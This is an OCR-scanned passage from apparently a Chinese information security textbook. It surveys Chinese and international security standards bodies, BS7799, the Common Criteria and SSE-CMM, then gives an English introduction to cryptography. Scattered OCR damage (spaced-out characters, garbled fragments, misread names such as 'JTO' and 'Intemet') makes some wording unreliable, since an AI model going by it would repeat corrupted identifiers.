推荐 性 两 种 属性 的 标准 。 保 障 人 体 健 康 、 人 身 、 财 产 安 全 的 标准 和 法 律 、 行 政法 规 规定 
强制 执行 的 标准 是 强制 性 标准 ， 其 他 标准 是 推荐 性 标准 。 省 、 自 治 区 、 直 辖 市 标准 化 行 
政 主 管 部 门 制定 的 工业 产品 安全 、 卫 生 要 求 的 地 方 标准 ， 在 本 地 区 域内 是 强制 性 标准 。 

强制 性 标准 是 由 法 律 规定 必须 遵照 执行 的 标准 。 强 制 性 标准 以 外 的 标准 是 推荐 性 标 
准 ， 又 叫 非 强制 性 标准 。 推 荐 性 国家 标准 的 代号 为 “GB/T”， 强 制 性 国家 标准 的 代号 为 
“GB”。 行 业 标 准 中 的 推荐 性 标准 也 是 在 行业 标准 代号 后 加 个 “T” 字 ， 如 “JB/T” 即 机 
械 行业 推荐 性 标准 ， 不 加 “T” 字 即 为 强制 性 行业 标准 。 

制定 标准 一 般 指 制定 一 项 新 标准 ， 是 指 制定 过 去 没有 而 现在 需要 进行 制定 的 标准 。 
它 是 根据 生产 发 展 的 需要 和 科学 技术 发 展 的 需要 及 其 水 平 来 制定 的 ， 因 而 它 反映 了 当前 
的 生产 技术 水 平 。 制 定 这 类 标准 的 工作 量 最 大 ， 工 作 要 求 最 高 ， 所 用 的 时 间 也 较 多 。 它 
是 一 个 国家 的 标准 化 工作 的 重要 方面 ， 反 映 了 这 个 国家 的 标准 化 工作 面貌 和 水 平 。 

一 个 新 标准 制定 后 ， 由 标准 批准 机 关 给 一 个 标准 编号 〈 包 括 年 代号 )， 同 时 标明 它 
的 分 类 号 ， 以 表明 该 标准 的 专业 隶属 和 制定 年 代 。 

修订 标准 则 是 指 对 一 项 已 在 生产 中 实施 多 年 的 标准 进行 修订 。 修 订 部 分 主要 是 生产 
实践 中 反映 出 来 的 不 适应 生产 现状 和 科学 技术 发 展 那 一 部 分 ， 或 者 修改 其 内 容 ， 或 者 了 予 
以 补充 ， 或 者 予以 删除 。 修 订 标 准 不 改动 标准 编号 ， 仅 将 其 年 代号 改 为 修订 时 的 年 代号 。 


1.4.2 ”标准 化 组 织 
为 适应 信息 技术 的 迅猛 发 展 ， 国 际 上 成 立 了 许多 标准 化 组 织 。 目 前 国际 上 有 两 个 重 
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要 的 标准 化 组 织 ， 即 国际 标准 化 组 织 (ISO) 和 国际 电工 委员 会 = (IEC). 

ISO Ail TEC 成 立 了 第 一 联合 技术 委员 会 JTO 制定 信息 技术 领域 国际 标准 ， 下 辖 19 
个 分 技术 委员 会 SC 和 功能 标准 化 专门 组 SGFS 等 特别 工作 小 组 ， 还 有 4 个 管理 机 构 ， 
即 一 致 性 评定 特别 工作 小 组 、 信 息 技术 任务 组 、 注 册 机 构 特别 工作 组 和 业务 分 析 与 计划 
特别 小 组 。 

SC27 是 JTC1 中 专门 从 事 信息 安全 通用 方法 及 技术 标准 化 工作 的 分 技术 委员 会 , 其 
工作 职责 包括 : 

。 确定 信息 技术 系统 安全 服务 的 一 般 需 求 ( 包 括 需求 的 方法 学 ) 

。 研究 并 制定 相关 的 安全 技术 和 机 制 ( 包 括 登 记 规程 和 安全 部 件 间 的 相互 关系 ) 

。 研究 并 制定 安全 指南 〈 如 说 明 性 的 文档 , 风险 分 析 等 ) 

。 研究 并 制定 管理 支撑 文档 和 标准 〈 如 词汇 、 安 全 评估 准则 等 ) ; 

。 研究 并 制定 用 于 完整 性 、 鉴 别 和 抗 抵赖 性 等 服务 的 密码 算法 标准 ， 同 时 根据 国际 

认可 的 策略 ， 研 究 并 制定 用 于 保密 性 服务 的 密码 算法 标准 。 

目前 ，SC27 下 设 三 个 工作 组 ， 各 工作 组 的 名 称 体现 了 各 自 的 工作 范围 ; 

。 第 一 工作 组 (WG1) : 需求 、 安 全 服务 及 指南 工作 组 ; 

。 第 二 工作 组 (WG2) : 安全 技术 与 机 制 工 作 组 ; 

。 第 三 工作 组 CwWG3) : 安全 评估 准则 工作 组 。 

到 目前 为 止 ，SC27 发 布 、 正 在 制定 及 规划 的 信息 安全 国际 标准 超过 80 项 。 这 些 标 
准 主要 包括 安全 技术 与 机 制 (如 密码 算法 、 散 列 函数 、 数 字 签 名 机 制 、 实 体 鉴 别 机 制 等 )、 
安全 评估 准则 和 安全 管理 (如 安全 管理 控制 措施 、 安 全 管理 指南 等 ) 。 这 些 标准 对 促进 
和 规范 信息 安全 领域 起 到 了 重要 的 指导 作用 。 

随 着 边缘 技术 的 出 现 ， 以 及 JTC1 内 其 他 分 技术 委员 会 职责 范围 的 交叉 ，SC27 启动 
了 联合 工作 机 制 ， 与 许多 组 织 进行 了 成 功 的 合作 。 例 如 : 在 ISOMEC JTC] 内 有 
SC6,SC7,SC17,SC36 和 SC37; 在 ISO 内 包括 TC68 和 TC215; 外 部 组 织 包 括 CCIMB, 
ETSI, ITU-T 和 ISSEA。 

美国 的 信息 技术 标准 主要 由 ANSI、NIST 制定 。 其 电子 工业 协会 EIA 和 通信 工业 协 
会 TIA 也 制定 了 部 分 信息 标准 。 欧 洲 的 ECMA 主要 在 世界 范围 内 制定 与 计算 机 及 计算 
机 应 用 有 关 的 标准 。IETF 主要 制定 与 因特网 有 关 的 标准 。 另 外 还 有 ITU, IEEE, EDTI 
All OMG 等 组 织 制定 有 关 的 信息 技术 标准 。 

国际 电工 委员 会 TEC 成 立 于 1906 年 ， 是 世界 上 最 早 的 国际 性 电工 标准 化 机 构 。IEC 
负责 有 关 电 工 、 电 子 领 域 的 国际 标准 化 工作 。 在 信息 安全 标准 化 方面 ， 除 了 同 ISO 联合 
成 立 的 ITC] 下 属 几 个 分 委员 会 外 ， 还 在 电磁 兼容 等 方面 成 立 技术 委员 会 ， 并 制定 相关 
国际 标准 , 如 信息 技术 设备 安全 (IEC 60950) 。 与 信息 安全 标准 化 相关 的 技术 委员 会 有 : 
TC56 一 一 可 靠 性 ; TC74 一 一 T 设备 安全 和 功效 ，TC77 一 一 电磁 兼容 ，CISPR 一 一 无 线 
HTB AAS 
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国际 电信 联盟 ITU 下 属 的 电信 标准 局 ITU-T 所 属 的 第 17 研究 组 SG17, 主要 负责 
究 通信 系统 安全 标准 。2001 年 底 ， SG7、SG10 和 SG17 合并 形成 了 新 的 SG17。 在 2001 
至 2004 年 这 一 研究 期 中 ,SG17 下 设 了 Question10 项 目 组 来 专门 从 事 信 息 安 全 标准 研究 。 
在 此 研究 期 内 ，Q10 组 主要 集中 于 定义 通信 系统 相关 的 整个 安全 框架 ， 项 目 组 活动 涉及 
到 协调 、 配 合并 推动 其 他 通信 系统 安全 相关 的 规范 制定 。ITU-T 单独 或 与 ISO 联合 开发 
了 消息 处 理 系统 (MHS) 、 目 录 系 统 (X.400 系列 、X.500 系列 ) 和 安全 框架 、 安 全 模 
型 等 方面 的 信息 安全 标准 ， 其 中 的 X.509 标准 是 开展 电子 商务 认证 的 重要 基础 标准 。 截 
止 2004 年 3 H, ITU-T 正式 发 布 的 信息 安全 标准 达 74 个 。 

Internet 工程 任务 组 (IETF) 主要 提出 Internet 标准 草案 和 称 为 “请 求 注解 ”(RFC) 的 
协议 文稿 ， 内 容 广 泛 ， 也 包括 安全 方面 的 建议 稿 ， 经 过 网 上 讨论 修改 ， 被 大 家 接受 的 就 
成 了 事实 上 的 标准 。 截至 2003 年 底 , 有 关 安 全 方面 的 RFC 有 190 多 个 , 例如 : RFC 1352 
SNMP 安全 协议 ，RFC 1421-1424 因特网 电子 邮件 保密 增强 ，RFC 1825 因特网 协议 安全 
体系 结构 等 。 这 些 事实 标准 对 提高 和 改善 Intemet 网 的 安全 性 起 到 了 至 关 重 要 的 作用 ， 
如 PKI、IPSec 等 标准 及 其 草案 将 成 为 指导 Intemet 未 来 安全 的 重要 文件 。 

欧洲 计算 机 厂商 协会 (ECMA) 成 立 于 1961 年 ， 除 吸收 欧洲 计算 机 厂商 ， 还 吸收 全 
球 其 他 洲 的 各 大 计算 机 公司 、 厂 商 成 为 其 会 员 ， 主 要 制定 计算 机 及 其 相关 应 用 的 标准 和 
技术 报告 ,经常 向 ISO 提交 标准 提案 。JTC1 的 欧洲 秘书 处 就 设 在 ECMA。 它 有 11 个 技 
RERA, HP TC32 “通信 、 网 络 和 系统 互 连 ” 曾 定义 了 开放 系统 应 用 层 安 全 结 
构 ;，TC36 一 一 “IT 安全 ”负责 信息 技术 设备 的 安全 标准 ， 目 前 主要 制定 商用 和 政府 用 
信息 技术 产品 和 系统 安全 性 评估 标准 化 框架 ， 以 及 在 开放 系统 环境 下 轴 辑 安全 设备 的 

美国 国家 标准 化 协会 ANSI 于 20 世纪 80 年 代 初 开始 数据 加 密 标准 化 工作 ， 共 制定 
了 3 项 美国 国家 标准 。ANSI 中 技术 委员 会 NCITS ( 即 X3) 负责 信息 技术 ,承担 着 JITC1 
秘书 处 的 工作 ， 其 中 ， 分 技术 委员 会 T4 专门 负责 IT 安全 技术 标准 化 工作 ， 对 口 JTC1 
的 SC27。ANSI 负责 金融 安全 的 X3 (NCITS) 、X9 (负责 制定 金融 业务 标准 ) 、X12 
(负责 制定 商业 交易 标准 〉 等 组 织 制 定 了 很 多 有 关 数 据 加 密 、 银 行业 务 安全 和 EDI 安全 
等 方面 的 标准 。 这 些 标准 中 ， 许 多 经 国际 标准 化 组 织 反复 讨论 后 成 为 国际 标准 。 已 制定 
金融 交易 卡 、 密 码 服务 消息 ， 以 及 实现 商业 交易 安全 等 方面 的 安全 标准 10 多 个 。 

美国 国家 标准 技术 研究 所 NIST 主要 负责 制定 联邦 计算 机 系统 标准 和 指导 文件 ， 所 
出 版 的 标准 和 规范 被 称 作 联 邦 信息 处 理 标准 (FIPS) . FIPS 安全 标准 也 是 美国 军用 信息 
安全 标准 的 重要 来 源 。FIPS 由 NIST 在 广泛 搜集 政府 各 部 门 及 私人 部 门 的 意见 的 基础 上 
写成 。 正 式 发 布 之 前 ， 将 FIPS 分 送 给 每 个 政府 机 构 ， 并 在 “联邦 注册 ”上 刊印 出 版 。 经 
再 次 征求 意见 之 后 ，NIST 局 长 把 标准 连同 NIST 的 建议 一 起 呈送 美国 商业 部 ， 由 商业 部 
长 签字 画 押 同意 或 反对 这 个 标准 。FIPS 安全 标准 的 一 个 著名 实例 就 是 数据 加 密 标准 
(DES) 。 从 20 世纪 70 年 代 公布 的 数据 加 密 标准 DES 开始 ，NIST 制定 了 一 系列 有 关 信 
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息 安 全 方面 的 联邦 信息 处 理 标准 FIPS， 截 至 2003 年 12 月 该 机 构 已 制定 了 33 项 信息 安 
全 相关 的 FIPS 和 66 项 信息 安全 相关 的 专题 出 版 物 (NIST SP 800 系列 和 NIST SP 500 
系列 ) 。 

美国 国防 部 DOD) 十 分 重视 信息 的 安全 问题 。DOD 发 布 了 一 些 有 关 信息 安全 和 
自动 信息 系统 安全 的 指令 、 指 示 和 标准 ， 并 且 加 强 信息 安全 的 管理 ， 特 别 是 DOD 
5200.28-STD《 可 信 计 算 机 系统 评估 准则 》， 受 到 各 方面 广泛 的 关注 ， 为 研究 制定 信息 技 
术 安全 性 评估 准则 提供 了 重要 的 基础 。 

美国 电气 电工 工程 师 协 会 (IEEE) 在 信息 安全 标准 化 方面 的 贡献 ， 主 要 是 提出 
LAN/WAN 安全 方面 的 标准 (SILS) 和 公 钥 密码 标准 (P1363) 。 从 1990 年 IEEE 成 立 
802.11“ 无 线 局 域 网 工作 组 ”以 来 ， 相 继 成 立 的 802.15“ 无 线 个 人 网 络 工作 组 ”、 802.16 
“无 线 宽带 网 络 工作 组 ”和 802.20“ 移 动 宽 带 无 线 接 入 工作 组 ”等 在 无 线 通信 安全 方面 也 
作 了 大 量 的 贡献 ， 如 正在 研制 的 IEEE 802.11i。 

除 上 述 主要 标准 化 组 织 外 ，CEN/ISSS、ETSI、3GPP、3GPP2、OASIS 等 区 域 性 标 
准 组 织 、 专 业 协 会 或 社会 团体 也 制定 了 一 些 安全 标准 ， 虽 然 它 们 不 是 国际 标准 ， 但 由 于 
其 制定 与 使 用 的 开放 性 ， 部 分 标准 已 成 为 信息 产业 界 广泛 接受 和 采纳 的 事实 标准 

在 国内 ， 我 国信 息 安全 标准 化 工作 ， 虽 然 起 步 较 晚 ， 但 是 近 10 年 来 发 展 较 快 。 为 
了 加 强 信息 安全 标准 化 工作 的 组 织 协调 力度 ， 在 国家 质量 技术 监督 局 领导 下 ， 国 家 标准 

化 管理 委员 会 于 2002 年 批准 成 立 全 国信 息 安 全 标准 化 技术 委员 会 (简称 信安 标 委 ， 委 员 
会 编号 为 TC260)， 在 制定 我 国信 息 安全 标准 方面 做 了 大 量 的 工作 ， 国 标 、 国 军 标 、 行 业 
标准 等 信息 安全 领域 均 有 涉及 。 

信安 标 委 的 成 立 标志 着 我 国信 息 安全 标准 化 工作 步 入 了 “统一 领导 、 协 调 发 展 ”的 
新 时 期 。 在 国家 质量 技术 监督 局 的 领导 和 支持 下 ， 国 家 信息 安全 标准 体系 的 框架 已 初步 
形成 ， 将 在 该 框架 内 以 政府 主管 部 门 推动 ， 产 业界 参与 的 模式 ， 按 急用 先 上 的 原则 逐步 
推出 我 国信 息 安全 技术 发 展 和 管理 应 用 急需 的 相关 标准 。 


1.4.3 ”信息 安全 标准 


信息 安全 标准 是 我 国信 息 安全 保障 体系 的 重要 组 成 部 分 ， 是 政府 进行 宏观 管理 的 重 
要 依据 。 从 国家 意义 上 来 说 ， 信 息 安全 标准 关系 到 国家 的 安全 及 经 济 利益 ， 标 准 往往 成 
为 保护 国家 利益 、 促 进 产业 发 展 的 一 种 重要 手段 。 信 息 安全 标准 化 是 一 项 艰巨 、 长 期 的 
基础 性 工作 。 我 国 从 20 世纪 80 年 代 开 始 ， 在 全 国信 息 技术 标准 化 技术 委员 会 信息 安全 
分 技术 委员 会 和 各 部 门 各 界 的 努力 下 ， 本 着 积极 采用 国际 标准 的 原则 ， 转 化 了 一 批 国际 
信息 安全 基础 技术 标准 ， 为 我 国信 息 安全 技术 的 发 展 作出 了 一 定 贡献 。 同 时 ， 公 安 部 、 
国家 安全 部 、 国 家 保密 局 、 国 家 密码 管理 委员 会 等 相继 制定 、 颁 布 了 一 批 信息 安全 的 行 
业 标 准 ， 为 推动 信息 安全 技术 在 各 行业 的 应 用 和 普及 发 挥 了 积极 的 作用 。 

随 着 人 们 对 信息 安全 认识 的 深入 ， 信 息 安全 标准 逐渐 成 为 信息 安全 领域 中 普遍 应 用 
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的 标准 。 对 广大 产品 提供 商 来 说 ， 生 产 符 合 标准 的 信息 安全 产品 、 参 与 信息 安全 标准 的 
制定 、 通 过 相关 的 信息 安全 方面 的 认证 ， 对 于 提高 厂商 形象 、 扩 大 市 场 份额 具有 重要 意 
Ms 对 用 户 而 言 ， 了 解 产 品 标准 有 助 于 选择 更 好 的 安全 产品 ， 了 解 评测 标准 则 可 以 科学 
地 评估 系统 的 安全 性 ， 了 解 安全 管理 标准 则 可 以 建立 实施 信息 安全 管理 体系 ; 对 普通 技 
术 人 员 来 讲 ， 了 解 信息 安全 标准 的 动态 可 以 站 在 信息 安全 产业 的 前 沿 ， 有 助 于 把 握 信息 
安全 产业 整体 的 发 展 方向 。 

截至 目前 ， 国 际 上 已 制定 了 大 量 有 关 信 息 安全 管理 的 国际 标准 ， 主 要 可 分 为 信息 安 
全 管理 与 控制 类 标准 和 技术 与 工程 类 标准 。 
1.4.3.1 ”信息 安全 管理 体系 标准 BS7799 

BS7799 标准 是 英国 标准 协会 (British Standards Institution, BSI) 制定 的 信息 安全 管 
理 体系 标准 。 它 包括 两 部 分 ， 其 第 一 部 分 《信息 安全 管理 实施 指南 》 于 2001 年 2 月 被 国 
际 标准 化 组 织 ISO) 采纳 为 国际 标准 ISO/IEC17799， 并 于 2005 年 6 月 15 日 发 布 了 最 
新 版 本 。 我 国 也 于 2004 年 完成 该 标准 的 转化 工作 。 这 一 部 分 主要 提供 了 信息 安全 管理 的 
一 些 通常 做 法 ， 用 于 指导 企业 信息 安全 管理 体系 的 建设 。 第 二 部 分 BS7799-2《 信 息 安全 
管理 体系 规范 和 应 用 指南 》 是 一 个 认证 标准 ， 描 述 了 信息 安全 管理 体系 各 个 方面 需要 达 
到 的 一 些 要 求 ， 可 以 以 此 为 标准 对 机 构 的 信息 安全 管理 体系 进行 考核 和 认证 。 

ISO/IEC 17799 的 目的 是 “为 信息 安全 管理 提供 建议 ， 旨 在 为 一 个 机 构 提 供用 来 制 
定安 全 标准 、 实 施 有 效 的 安全 管理 时 的 通用 要 素 ， 并 得 以 使 跨 机 构 的 交易 得 到 互信 ”。 

机 构 实施 BS7799 的 目的 是 按照 先进 的 信息 安全 管理 标准 建立 完整 的 信息 安全 管理 
体系 ， 达 到 动态 的 、 系 统 的 、 全 员 参 与 的 、 制 度 化 的 、 以 预防 为 主 的 信息 安全 管理 方式 ， 
用 最 低 的 成 本 ， 获 得 较 高 的 信息 安全 水 平 ， 从 根本 上 保证 业务 的 连续 性 。 

BS7799 作为 信息 安全 管理 领域 的 一 个 权威 标准 ， 是 全 球 业 界 一 致 公认 的 辅助 信息 
安全 治理 手段 ， 该 标准 的 最 大 意义 在 于 可 以 为 管理 层 提供 一 套 可 量体裁衣 的 信息 安全 管 
理 要 项 、 一 套 与 技术 负责 人 或 组 织 高 层 进行 沟通 的 共同 语言 ， 以 及 保护 信息 资产 的 制度 
框架 。 
1.4.3.2 ”技术 与 工程 标准 

美国 于 1985 年 颁布 的 可 信 计 算 机 系统 评估 标准 TCSEC (业界 通常 称 为 信息 安全 桶 
皮 书 ) 为 计算 机 安全 产品 的 评测 提供 了 测试 内 容 和 方法 ， 指 导 信息 安全 产品 的 制造 和 
应 用 。 

信息 安全 产品 和 系统 安全 性 测评 标准 ， 是 信息 安全 标准 体系 中 非常 重要 的 一 个 分 
支 ， 经 历 了 一 系列 的 重要 标准 ， 其 中 ， 信 息 安 全 产品 通用 测评 标准 ISO/ITEC15408 一 1999 
《信息 技术 、 安 全 技术 、 信 息 技术 安全 性 评估 准则 》 《简称 CC) 相当 于 最 后 的 集大成 者 ， 
是 目前 国际 上 最 通行 的 信息 技术 产品 及 系统 安全 性 评估 准则 ， 也 是 信息 技术 安全 性 评估 
结果 国际 互 认 的 基础 。 

CC 标准 定义 了 作为 评估 信息 技术 产品 和 系统 安全 性 的 基础 准则 ， 提 出 了 目前 国际 
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上 公认 的 表述 信息 技术 安全 性 的 结构 ， 即 把 安全 要 求 分 为 规范 产品 和 系统 安全 行为 的 功 
能 要 求 以 及 解决 如 何 正确 有 效 地 实施 这 些 功能 的 保证 要 求 。 功 能 和 保证 要 求 又 以 “类 - 
子 类 -组 件 ”的 结构 表述 , 组 件 作为 安全 功能 的 最 小 构件 块 ， 可 以 用 于 “保护 轮廓 ”“ 安 
全 目标 ”和 “ 包 ” 的 构建 ， 例 如 由 保证 组 件 构成 典型 的 包 -“ 评 估 保 证 级 ”。 另 外 ， 功 能 
组 件 还 是 连接 CC 与 传统 安全 机 制 和 服务 的 桥梁 , 以 及 解决 CC 同 已 有 准则 如 TCSEC 的 

CC 标准 分 为 3 个 部 分 : 第 1 部 分 “简介 和 一 般 模型 ”， 正 文 介绍 了 CC 中 的 有 关 术 
语 、 基 本 概念 和 一 般 模 型 以 及 与 评估 有 关 的 一 些 框架 ， 附 录 部 分 主要 介绍 “保护 轮廓 ” 
和 “安全 目标 ”的 基本 内 容 ; 第 2 部 分 “安全 功能 要 求 ”， 按 “类 - 子 类 -组 件 ”的 方式 
提出 安全 功能 要 求 ， 每 一 个 类 除 正文 以 外 ， 还 有 对 应 的 提示 性 附录 作 进一步 解释 ， 第 3 
部 分 “安全 保证 要 求 ”， 定 义 了 评估 保证 级 别 ， 介 绍 了 “保护 轮廓 ”和 “安全 目标 ”的 
评估 ， 并 按 “ 类 - 子 类 -组 件 ” 的 方式 提出 安全 保证 要 求 。CC 的 三 个 部 分 相互 依存 ， 缺 一 
不 可 。 其 中 ， 第 1 部 分 是 介绍 CC 的 基本 概念 和 基本 原理 ， 第 2 部 分 提出 了 技术 要 求 ， 
第 3 部 分 提出 了 非 技术 要 求 和 对 开发 过 程 、 工 程 过 程 的 要 求 。 这 3 部 分 的 有 机 结合 具体 
体现 在 “保护 轮廓 ”和 “安全 目标 ”中 ，“ 保 护 轮廓 ”和 “安全 目标 ”的 概念 和 原理 由 
第 1 部 分 介绍 。“ 保 护 轮廓 ”和 “安全 目标 ”中 的 安全 功能 要 求 和 安全 保证 要 求 在 第 2、 
3 部 分 选取 ， 这 些 安全 要 求 的 完备 性 和 一 致 性 由 第 2、3 部 分 来 保证 。 

CC 标准 的 核心 思想 有 两 点 : 一 是 信息 安全 技术 提供 的 安全 功能 本 身 和 对 信息 安全 
技术 的 保证 承诺 之 间 独 立 ; 二 是 安全 工程 的 思想 ， 即 通过 对 信息 安全 产品 的 开发 、 评 价 、 
使 用 全 过 程 的 各 个 环节 实施 安全 工程 来 确保 产品 的 安全 性 。CC 标准 强调 在 IT 产品 和 系 
统 的 整个 生命 周期 确保 安全 性 ， 因 此 ，CC 标准 可 以 同时 面向 消费 者 、 开 发 者 、 评 价 者 3 
类 用 户 ， 同 时 支持 他 们 的 应 用 。 对 应 3 种 不 同 的 用 户 ，CC 标准 有 3 种 主要 应 用 方式 : 
定义 安全 需求 、 辅 助 安全 产品 开发 、 评 价 产品 安全 性 。 

系统 安全 工程 能 力 成 熟 度 模型 SSE-CMM 是 系统 安全 工程 具体 应 用 领域 的 一 个 分 
支 ， 由 美国 国家 安全 局 领导 开发 。 它 确定 了 一 个 评价 安全 工程 实施 的 综合 框架 ， 提 供 了 
度量 与 改善 安全 工程 学 科 应 用 情况 的 方法 ， 同 时 还 是 一 个 易于 理解 的 评估 系统 安全 工程 
实施 的 框架 。 

SSE-CMM 和 BS7799 都 提出 了 一 系列 最 佳 惯例 ， 二 者 之 间 也 有 了 映射 关系 ， 不 同 之 
处 在 于 : BS7799 是 一 个 认证 标准 , 提出 了 一 个 可 供认 证 的 信息 安全 管理 体系 , 组织 应 该 
将 其 作为 目标 ， 通 过 选择 适当 的 控制 措施 去 实现 ， 但 具体 怎么 实现 ， 需 要 哪些 过 程 ， 
BS7799 都 没有 规定 。SSE-CMM 是 一 个 评估 标准 ， 它 定义 了 实现 最 终 安全 目标 需要 的 一 
系列 过 程 ， 并 对 组 织 执行 这 些 过程 的 能 力 进行 等 级 划分 。 因 此 ， 二 者 可 以 互补 使 用 。 实 
际 上 ，SSE-CMM 更 适合 作为 评估 工程 实施 组 织 能 力 与 资质 的 标准 ， 对 用 户 来 说 ， 则 是 
选择 服务 提供 商 的 一 个 参照 。 我 国 的 国家 信息 安全 测评 认证 中 心 在 审核 专业 机 构 信 息 安 
全 服务 资质 时 ， 基 本 上 就 是 参照 SSE-CMM 来 审核 并 划分 等 级 的 。 
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我 国 在 信息 安全 管理 标准 的 制定 方面 ， 主 要 采取 与 国际 标准 靠拢 的 方式 。 全 国信 息 
安全 标准 化 技术 委员 会 (简称 信息 安全 标 委 会 ) 自 成 立 以 来 ， 在 国家 标准 化 管理 委员 会 
的 指导 下 ， 在 公安 部 、 国 家 保密 局 、 中 央 机 要 局 、 安 全 部 、 信 息 产 业 部 〈 工 信和 部) 等 各 
部 门 的 大 力 支持 下 ， 通 过 多 方 的 协调 ， 研 究 制 定 了 一 批 基 础 的 、 急 需 的 、 关 键 的 信息 安 
全 标准 ， 初 步 缓解 了 我 国信 息 安 全 标准 的 不 足 ， 改 变 了 一 些 信息 安全 领域 无 标准 可 依 的 
状况 。 

2001 年 参照 国际 标准 ISO/IEC15408， 制 定 了 国家 标准 GB/T18336《 信 息 技术 安全 
性 评估 准则 》， 作 为 评估 信息 技术 产品 与 信息 安全 特性 的 基础 准则 。 

信息 安全 标 委 会 以 工作 组 为 主体 开展 信息 安全 标准 的 研究 制定 工作 ， 工 作 组 由 国内 
信息 安全 技术 领域 的 有 关 部 门 、 研 究 机 构 、 企 事业 单位 及 高 等 院 校 等 代表 组 成 ， 是 标准 
研制 的 技术 力量 。 目 前 正式 成 立 了 以 下 工作 组 。 

信息 安全 标准 体系 与 协调 工作 组 (WG1)， 主 要 负责 研究 信息 安全 标准 体系 、 跟 踪 国 
际 信息 安全 标准 发 展 动态 ， 研 究 、 分 析 国 内 信息 安全 标准 的 应 用 需求 ， 研 究 并 提出 了 新 
工作 项 目 及 设立 新 工作 组 的 建议 、 协 调 各 工作 组 项 目 。 

涉 密 信息 系统 安全 保密 工作 组 (WG2)、 密 码 工作 组 (WG3) 和 鉴别 与 授权 工作 组 
(WG4)。 

信息 安全 评估 工作 组 (WG5)， 负 责 调研 国内 外 测评 标准 现状 与 发 展 趋势 ， 研 究 提出 
了 我 国 统一 测评 标准 体系 的 思路 和 框架 ， 研 究 提 出 了 系统 和 网 络 的 安全 测评 标准 思路 和 
框架 ， 研 究 提出 了 急需 的 测评 标准 项 目 和 制定 计划 。 

信息 安全 管理 工作 组 (WG7)， 负 责 信息 安全 管理 标准 体系 的 研究 和 国内 急需 的 标准 
Was 理 相关 的 基础 性 标准 的 制定 工作 。 

本 着 “科学 、 、 系 统 、 适 用 ”的 原则 ， 在 充分 借鉴 和 吸收 国际 先进 信息 安全 技 
wa es 
认真 研究 ， 初 步 形成 了 我 国信 息 安全 标准 体系 。 
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1.5.1 Cryptography 


1. Reading Materials 

Cryptography"! is the practice and study of hiding information. In modern times, 
cryptography is considered a branch of both mathematics and computer science, and is 
affiliated closely with information theory, computer security, and engineering. Cryptography is 
used in applications present in technologically advanced societies; examples include the 


security of ATM cards, computer passwords, and electronic commerce, which all depend on 
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cryptography. 

(1) Terminology 

Until modem times, cryptography referred almost exclusively to encryption, the process 
of converting ordinary information (plaintext) into unintelligible gibberish (i.e., ciphertext)?! 
Decryption is the reverse, moving from unintelligible ciphertext to plaintext. A cipher (or 
cypher) is a pair of algorithms which creates the encryption and the reversing decryption. The 
detailed operation of a cipher is controlled both by the algorithm and, in each instance, by a 
key. This is a secret parameter (ideally, known only to the communicants) for a specific 
message exchange context. Keys are important, as ciphers without variable keys are trivially 
breakable and therefore less than useful for most purposes. Historically, ciphers were often 
used directly for encryption or decryption, without additional procedures such as 
authentication or integrity checks. 

In colloquial use, the term "code" is often used to mean any method of encryption or 
concealment of meaning. However, in cryptography, code has a more specific meaning; it 
means the replacement of a unit of plaintext (i.e., a meaningful word or phrase) with a code 
word (for example, apple pie replaces attack at dawn). Codes are no longer used in serious 
cryptography—except incidentally for such things as unit designations (e.g., Bronco Flight or 
Operation Overlord) —- since properly chosen ciphers are both more practical and more 
secure than even the best codes, and better adapted to computers as well. 

Some use the terms cryptography and cryptology interchangeably in English, while 
others use cryptography to refer specifically to the use and practice of cryptographic 
techniques, and cryptology to refer to the combined study of cryptography and 
cryptanalysis. P! 

The study of characteristics of languages which have some application in cryptology, i.e. 
frequency data, letter combinations, universal patterns, etc. is called Cryptolinguistics. 

(2) Modern cryptography 

The modern field of cryptography can be divided into several areas of study. The chief 
ones are discussed here; see Topics in Cryptography for more. 

(3) Symmetric-key cryptography 

Symmetric-key cryptography refers to encryption methods in which both the sender and 
receiver share the same key (or, less commonly, in which their keys are different, but related in 
an easily computable way). This was the only kind of encryption publicly known until June 
1976." 

One round (out of 8.5) of the patented IDEA cipher, used in some versions of PGP for 
high-speed encryption of, for instance, e-mail. 

The modern study of symmetric-key ciphers relates mainly to the study of block ciphers 
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and stream ciphers and to their applications. A block cipher is, in a sense, a modern 
embodiment of Alberti’s polyalphabetic cipher: block ciphers take as input a block of plaintext 
and a key, and output a block of ciphertext of the same size. Since messages are almost always 
longer than a single block, some method of knitting together successive blocks is required. 
Several have been developed, some with better security in one aspect or another than others. 
They are the mode of operations and must be carefully considered when using a block cipher 
in a cryptosystem. 

The Data Encryption Standard (DES) and the Advanced Encryption Standard (AES) are 
block cipher designs which have been designated cryptography standards by the US 
government (though DES’s designation was finally withdrawn after the AES was adopted). 
Despite its deprecation as an official standard, DES (especially its still-approved and much 
more secure triple-DES variant) remains quite popular; it is used across a wide range of 


[12] 


applications, from ATM encryption"! to e-mail privacy’ ~ and secure remote access.0 引 Many 


other block ciphers have been designed and released, with considerable variation in quality. 
Many have been thoroughly broken. See Category:Block ciphers. PP 

Stream ciphers, in contrast to the ‘block’ type, create an arbitrarily long stream of key 
material, which is combined with the plaintext bit-by-bit or character-by-character, somewhat 
like the one-time pad. In a stream cipher, the output stream is created based on an internal state 
which changes as the cipher operates. That state change is controlled by the key, and, in some 
stream ciphers, by the plaintext stream as well. RC4 is an example of a well-known, and 
widely used, stream cipher; see Category:Stream ciphers”! 

Cryptographic hash functions (often called message digest functions) do not necessarily 
use keys, but are a related and important class of cryptographic algorithms. They take input 
data (often an entire message), and output a short, fixed length hash, and do so as a one-way 
function. For good ones, collisions (two plaintexts which produce the same hash) are 
extremely difficult to find. 

Message authentication codes (MACs) are much like cryptographic hash functions, 
except that a secret key is used to authenticate the hash value"! on receipt. These block an 
attack against plain hash functions. 

(4) Public-key cryptography 

Symmetric-key cryptosystems use the same key for encryption and decryption of a 
message, though a message or group of messages may have a different key than others. A 
significant disadvantage of symmetric ciphers is the key management necessary to use them 
securely. Each distinct pair of communicating parties must, ideally, share a different key, and 


perhaps each ciphertext exchanged as well. The number of keys required increases as the 
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square of the number of network members, which very quickly requires complex key 
management schemes to keep them all straight and secret. The difficulty of securely 
establishing a secret key between two communicating parties, when a secure channel doesn’t 
already exist between them, also presents a chicken-and-egg problem which is a considerable 
practical obstacle for cryptography users in the real world. 

Whitfield Diffie and Martin Hellman, authors of the first paper on public-key 
cryptography. 

In a groundbreaking 1976 paper, Whitfield Diffie and Martin Hellman proposed the 
notion of public-key (also, more generally, called asymmetric key) cryptography in which two 
different but mathematically related keys are used — a public key and a private key." A 
